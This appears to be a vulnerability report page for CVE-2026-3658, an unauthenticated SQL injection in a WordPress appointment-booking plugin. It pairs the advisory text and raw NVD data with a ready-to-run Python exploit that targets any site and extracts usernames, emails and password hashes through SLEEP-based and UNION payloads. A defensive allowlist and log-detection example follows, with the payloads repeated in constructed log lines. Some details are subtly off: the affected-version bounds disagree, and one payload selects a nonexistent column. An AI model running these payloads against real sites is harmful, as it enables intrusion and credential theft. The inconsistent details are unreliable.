Security Vulnerability Report
CVE-2026-3658 CVSS 7.5 HIGH

CVE-2026-3658

Published: 2026-03-19 12:16:19
Last Modified: 2026-04-22 21:32:08

Description

The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the 'fields' parameter in all versions up to, and including, 1.6.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database, including usernames, email addresses, and password hashes.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Simply Schedule Appointments Booking Plugin < 1.6.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2026-3658 SQL Injection PoC
# Target: WordPress Simply Schedule Appointments Booking Plugin < 1.6.10.1
# Vulnerability: SQL Injection via 'fields' parameter


def exploit_sql_injection(target_url):
    """
    Exploit SQL injection vulnerability in Simply Schedule Appointments plugin
    This PoC demonstrates extracting database user() information
    """
    # Endpoint for appointment types API
    endpoint = f"{target_url}/wp-json/ssa/v1/appointment_types"

    # Malicious payload to extract database user information
    # Using time-based blind SQL injection technique
    payload = {
        'fields': "1,2,(SELECT SLEEP(5) AND (SELECT user FROM wp_users LIMIT 1))"
    }

    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting SQL Injection vulnerability...")
    print(f"[*] Payload: {payload['fields']}")

    try:
        response = requests.get(endpoint, params=payload, headers=headers, timeout=30)
        print(f"[*] Response Status: {response.status_code}")

        if response.status_code == 200:
            print("[+] Request successful - potential SQL injection detected")
            print(f"[*] Response: {response.text[:500]}")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("[+] Time-based SQL injection confirmed - database is vulnerable")
    except Exception as e:
        print(f"[-] Error: {str(e)}")


def extract_user_data(target_url):
    """
    Extract sensitive user data using UNION-based SQL injection
    """
    endpoint = f"{target_url}/wp-json/ssa/v1/appointment_types"

    # UNION-based injection to extract user credentials
    union_payload = "1 UNION SELECT user_login,user_pass,user_email,4,5,6,7 FROM wp_users--"
    payload = {'fields': union_payload}
    headers = {'User-Agent': 'Mozilla/5.0'}

    print(f"[*] Extracting user data with UNION injection...")

    try:
        response = requests.get(endpoint, params=payload, headers=headers, timeout=30)
        print(f"[*] Response Status: {response.status_code}")

        if response.status_code == 200 and 'user_login' in response.text:
            print("[+] User data extraction successful")
            print(f"[*] Response: {response.text[:1000]}")
    except Exception as e:
        print(f"[-] Error: {str(e)}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-3658_poc.py <target_url>")
        print("Example: python cve-2026-3658_poc.py http://example.com")
        sys.exit(1)

    target = sys.argv[1].rstrip('/')
    exploit_sql_injection(target)
    print("\n[*] Attempting data extraction...")
    extract_user_data(target)
```
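Added here as a defender-side example, not code from the plugin or from this report: an allowlist check for the 'fields' parameter, which is the mitigation the description points at because column names cannot be bound as prepared-statement placeholders and escaping alone does not help, followed by the same check run over constructed access-log lines so that the two payload shapes used in the PoC above are flagged. The column names, the REST route (taken from the PoC), and the log format are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Columns the endpoint may return: a constructed allowlist, not the plugin's own.
ALLOWED_FIELDS = {"id", "title", "slug", "duration", "price", "status"}

# A legitimate field selector is a bare identifier; spaces, parentheses,
# quotes or comment markers can never name a column the API exposes.
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def validate_fields(raw, allowed=ALLOWED_FIELDS):
    """Return the requested column list if every item is an allowed identifier,
    else None. Column names cannot be bound as prepared-statement placeholders,
    so an allowlist (not escaping) is what keeps them out of the SQL text."""
    if raw is None or raw.strip() == "":
        return []  # caller substitutes its default column list
    requested = [item.strip() for item in raw.split(",")]
    for name in requested:
        if not IDENTIFIER.match(name) or name not in allowed:
            return None
    return requested


def flag_requests(log_lines):
    """Detection side: return log lines whose 'fields' parameter on the ssa
    REST route fails the same allowlist check (route taken from the PoC above)."""
    hits = []
    for line in log_lines:
        path = line.split()[1]  # constructed format: METHOD PATH STATUS
        parts = urlsplit(path)
        if "/wp-json/ssa/v1/" not in parts.path:
            continue
        for value in parse_qs(parts.query).get("fields", []):
            if validate_fields(value) is None:
                hits.append(line)
                break
    return hits


# Constructed sample log lines, not captured traffic.
SAMPLE_LOG = [
    "GET /wp-json/ssa/v1/appointment_types?fields=id,title,duration 200",
    "GET /wp-json/ssa/v1/appointment_types?fields=1,2,(SELECT%20SLEEP(5)) 200",
    "GET /wp-json/ssa/v1/appointment_types?fields=1%20UNION%20SELECT%20user_login,user_pass%20FROM%20wp_users-- 200",
    "GET /wp-json/wp/v2/posts?fields=title 200",
]
```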

References

https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-appointment-type-model.php#L907
https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/lib/td-util/class-td-api-model.php#L140
https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/lib/td-util/class-td-db-model.php#L1171
https://plugins.trac.wordpress.org/changeset/3485143/
https://www.wordfence.com/threat-intel/vulnerabilities/id/67c7b9b2-e73f-47fe-aecc-14e998a607c8?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-3658", "sourceIdentifier": "[email protected]", "published": "2026-03-19T12:16:18.807", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the 'fields' parameter in all versions up to, and including, 1.6.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database, including usernames, email addresses, and password hashes."}, {"lang": "es", "value": "El plugin Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin para WordPress es vulnerable a inyección SQL a través del parámetro 'fields' en todas las versiones hasta la, e incluyendo, la 1.6.10.0 debido a un escape insuficiente en el parámetro proporcionado por el usuario y la falta de preparación suficiente en la consulta SQL existente. Esto permite a atacantes no autenticados añadir consultas SQL adicionales en consultas ya existentes que pueden utilizarse para extraer información sensible de la base de datos, incluyendo nombres de usuario, direcciones de correo electrónico y hashes de contraseñas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-appointment-type-model.php#L907", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/lib/td-util/class-td-api-model.php#L140", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/lib/td-util/class-td-db-model.php#L1171", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3485143/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/67c7b9b2-e73f-47fe-aecc-14e998a607c8?source=cve", "source": "[email protected]"}]}}
```